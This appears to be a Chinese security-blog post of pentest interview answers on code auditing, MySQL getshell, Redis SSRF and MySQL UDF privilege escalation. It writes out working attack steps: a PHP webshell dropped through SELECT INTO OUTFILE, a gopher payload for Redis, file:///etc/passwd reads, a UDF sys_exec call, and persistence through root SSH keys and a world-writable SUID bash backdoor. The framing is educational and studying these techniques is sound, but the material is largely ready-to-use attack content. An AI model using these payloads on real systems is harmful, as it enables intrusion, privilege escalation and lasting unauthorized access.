安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
一、代码审计核心思路(261)
二、MySQL Getshell前提(262)
三、mysql.ini 关键配置(263)
四、Redis SSRF攻击内网(264)
攻击流程:
常用协议及用途:
五、UDF提权详解(265)
原理流程:
实操步骤:
六、网络安全学习资源(266)
推荐矩阵:
二百六十一、代码审计的思路是什么二百六十二、mysql getshell的前提是什么二百六十三、其中需要mysql.ini 配置参数应该是怎样二百六十四、redis ssf 如何攻击内网,可以用到哪些协议二百六十五、说一下udf提权二百六十六、平常经常在哪些地方学习一、代码审计核心思路(261)
mermaidgraph LR A[信息收集] --> B[静态分析] B --> C[动态验证] C --> D[漏洞利用] D --> E[报告输出]
- 四阶段审计法
- 入口定位:扫描用户输入点(GET/POST参数、文件上传、Cookie)
- 数据流追踪:跟踪外部输入在代码中的传播路径(如
$_GET→SQL查询)- 危险函数检测:
- 执行类:
eval()/system()/exec()- 文件类:
file_put_contents()/move_uploaded_file()- 反序列化:
unserialize()- 上下文验证:确认过滤机制有效性(如
htmlspecialchars()位置是否正确)
二、MySQL Getshell前提(262)
需同时满足:
- 数据库权限
FILE权限:SELECT user,file_priv FROM mysql.user- 可通过
GRANT FILE ON *.* TO 'user'@'%'获取- 路径条件
- 已知Web绝对路径(通过报错/配置文件泄露)
secure_file_priv非NULL状态(通过SHOW VARIABLES LIKE 'secure_file_priv'验证)- 写入可行性
- 目标目录MySQL进程可写(Linux默认
/tmp,WindowsC:\Windows\Temp)- 非只读文件系统
📌 关键命令:
sqlSELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php';
三、mysql.ini 关键配置(263)
ini# 允许文件导出(必须为空或指定目录) secure_file_priv = "" # 开启加载本地数据(非必须但推荐) local-infile = 1 # 设置插件目录(UDF提权需用) plugin_dir = /usr/lib/mysql/plugin/ # 配置项验证命令: SHOW VARIABLES LIKE 'secure_file_priv';
四、Redis SSRF攻击内网(264)
攻击流程:
mermaidsequenceDiagram Attacker->>+Vulnerable_Server: SSRF请求 Vulnerable_Server->>+Redis: Gopher协议指令 Redis-->>-Vulnerable_Server: 返回响应 Vulnerable_Server-->>-Attacker: 回显结果常用协议及用途:
协议 攻击场景 Payload示例 Gopher 发送任意Redis命令 gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$10%0d%0aevilcommand%0d%0aDict 端口扫描/服务探测 dict://192.168.1.1:80/infoHTTP 穿透WAF攻击内网Web应用 封装Redis命令为HTTP POST File 读取服务器敏感文件 file:///etc/passwd
五、UDF提权详解(265)
原理流程:
mermaidgraph TB A[上传恶意.so/.dll] --> B[创建UDF函数] B --> C[调用函数执行命令] C --> D[获取系统权限]实操步骤:
- 环境检测
- 确认MySQL版本:
SELECT @@version- 获取插件路径:
SHOW VARIABLES LIKE 'plugin_dir'- 上传共享库
- 利用
SELECT ... INTO DUMPFILE写入udf.so(需16进制转换)- 函数创建
sqlCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so'; SELECT sys_exec('chmod 4755 /usr/bin/bash');- 权限维持
- 添加SSH密钥:
echo pub_key >> /root/.ssh/authorized_keys- 创建SUID后门:
chown root:root /bin/bash; chmod 4777 /bin/bash
六、网络安全学习资源(266)
推荐矩阵:
类型 推荐平台 核心价值 漏洞实验室 Hack The Box、TryHackMe 真实渗透环境实战 技术社区 Reddit r/netsec、先知社区 前沿漏洞分析/工具分享 视频课程 PentesterLab、OffensiveSec 手把手教学(含CVE复现) 博客追踪 PortSwigger、Project Zero 深度技术解析(如0day分析) CTF平台 CTFtime、攻防世界 竞赛驱动技能提升 漏洞库 Exploit-DB、CVE Details 最新漏洞PoC/影响分析 代码仓库 GitHub(关键词:CVE/PoC) 开源工具链(如sqlmap源码研究)
![[创业之路-560]:机械、电气、自控、电子、软件、信息、通信、大数据、人工智能,上述技术演进过程](http://pic.xiahunao.cn/[创业之路-560]:机械、电气、自控、电子、软件、信息、通信、大数据、人工智能,上述技术演进过程)
)
